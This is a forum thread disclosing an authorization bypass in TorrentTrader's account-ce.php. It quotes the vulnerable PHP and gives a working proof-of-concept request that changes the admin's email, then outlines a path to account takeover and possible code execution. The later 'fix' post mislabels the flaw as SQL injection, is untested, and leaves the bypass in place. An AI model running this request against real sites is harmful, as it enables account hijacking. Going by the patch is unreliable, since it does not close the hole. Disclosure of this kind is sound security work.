Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   Torrent Trader (http://www.bvlist.com/forumdisplay.php?f=29)
-   -   Unauthorized Email Change (http://www.bvlist.com/showthread.php?t=11969)

BamBam0077 9th April 2019 19:28

Unauthorized Email Change
 
################################################## #############################
1. Unauthorized Email Change in "account-ce.php"
################################################## #############################

Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's

-----------------[ source code start ]---------------------------------

PHP Code:

$id = (int) $_GET["id"]; 
$md5 $_GET["secret"]; 
$email $_GET["email"]; 
$res SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'"); 
$row mysql_fetch_assoc($res);
$sec $row["editsecret"]; 
if (
$md5 != md5($sec $email $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1); 
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " sqlesc($row["editsecret"])); 

-----------------[ source code end ]-----------------------------------

Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452".
Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com
Quick look to the database confirms, that email address of user with ID 1 has been changed indeed.
Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php
After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution.

################################################## #############################

MicroMonkey 13th April 2019 05:15

what is that? Please explain in full detail

BamBam0077 13th April 2019 15:36

Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email" Preconditions: none Result: attacker can change any user's email, including admin's
Code:

$id = (int) $_GET["id"]; $md5 = $_GET["secret"]; $email = $_GET["email"]; .. $res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'"); $row = mysql_fetch_assoc($res); .. $sec = $row["editsecret"]; if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1); SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));

Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test @test.com

Quick look to the database confirms, that email address of user with ID 1 has been changed indeed.

Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution.

M-jay 30th April 2019 16:22

This would be sql injection correct? I've been looking at adding something to improve this. So far it looks like pdo is the best or can you do it using composer.json.
Im new to this but could you point us in right direction to implement one of these.

BamBam0077 21st October 2019 19:39

Just sanitize the variables in SQL query where necessary sqlesc() or mysqli_real_string_escape() if you have converted over to mysqli and I believe try to use trim() around:

PHP Code:

$md5 $_GET["secret"]; 
$email $_GET["email"]; 
$sec $row["editsecret"]; 

SQL ESC
PHP Code:

$res SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '".sqlesc($id)."'"); 
[
B]AND[/B]
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = ' " sqlesc($id)."' AND `editsecret` = " sqlesc($row["editsecret"])); 

NOT TESTED YET WILL TRY WHEN PC HAS ARRIVED :ok:


All times are GMT +2. The time now is 10:53.

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.